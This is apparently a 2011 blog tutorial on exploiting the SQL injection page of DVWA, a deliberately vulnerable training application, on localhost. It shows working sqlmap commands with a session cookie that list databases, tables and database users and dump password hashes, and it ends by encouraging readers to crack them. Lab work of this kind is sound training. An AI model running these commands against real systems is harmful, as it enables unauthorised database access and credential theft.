October 19, 2011

Owning DVWA SQLi with sqlmap


Here we go... finally writing this post on SQL injection on DVWA. I was caught up with some really boring office -day job- work and  some other things to top that. But that has always  been  the case with my blogging. Its a sad story.

In this post I will explain the exploitation of SQL injection vulnerability present in DVWA. For details on DVWA and how to get it, please visit my previous post.


SQLMAP:
sqlmap is an automatic SQL injection and database takeover tool. SQLMAP is capable of enumerating entire remote databases, and perform an active database fingerprinting.
Get sqlmap from : http://sqlmap.sourceforge.net/

I am documenting steps that I carried out to pwn the DVWA. You are free to experiment with different options and parameters of sqlmap, it is a great tool.


Looking for SQL injection in the webapp:
The best way to detect SQL injection in a webapp is by looking into the URL of it. If you are able to change the parameters passed in the URL and that change is reflected in the output of the webapp, you can say that the parameter is being passed to the database at the backed. You will then need to verify if this indeed allows you to inject SQL in it.
URL for the DVWA SQLi page is: 
http://localhost/dvwa/vulnerabilities/sqli/

After we enter a value (e.g. 1) in the text box, result is displayed on the page and the url of the page becomes:
http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

We can see that, after changing the value for parameter in the URL, different results are obtained.
Now, lets check whether this page is vulnerable to SQLi using sqlmap.

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"

This command can be used to test standalone web pages for SQLi, but in our case, because we are testing a page behind a login page, we are redirected to login.php page as we are not authenticated. To avoid this, we can use --cookie flag of sqlmap.
We need to provide value of cookie set after we have logged in to DVWA. Cookie value can be found out using tools like Burp Suite, Web Scarab etc.

After finding out cookie value, issue following command:


./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --dbs


The --dbs flag lists database names if SQLi is successful.

sqlmap returns with goodies :)


--snip--
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

We will then try to enumerate tables in one of the databases. 
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" -D dvwa --tables
And we are not disappointed... :)


Database: dvwa

[2 tables]
+-----------+
| guestbook |
| users         |
+-----------+

You can continue to enumerate the target with rich set of functionality provided by sqlmap. I will show you the mettle of sqlmap straightaway ;)

We can view who is the current user:
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --current-user
current user:    'root@localhost'

or all list database users:
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --users
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-desktop'
[*] 'root'@'localhost'

Now that you have users list, you will want to know their passwords as well. That is why sqlmap provides us with --passwords flag ;)

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --users --passwords

database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *3F436344A61D99410B1DD47F05788FD5DD72E483
[*] root [1]:
    password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

Crack these hashes and enjoy ;)



No comments:

Post a Comment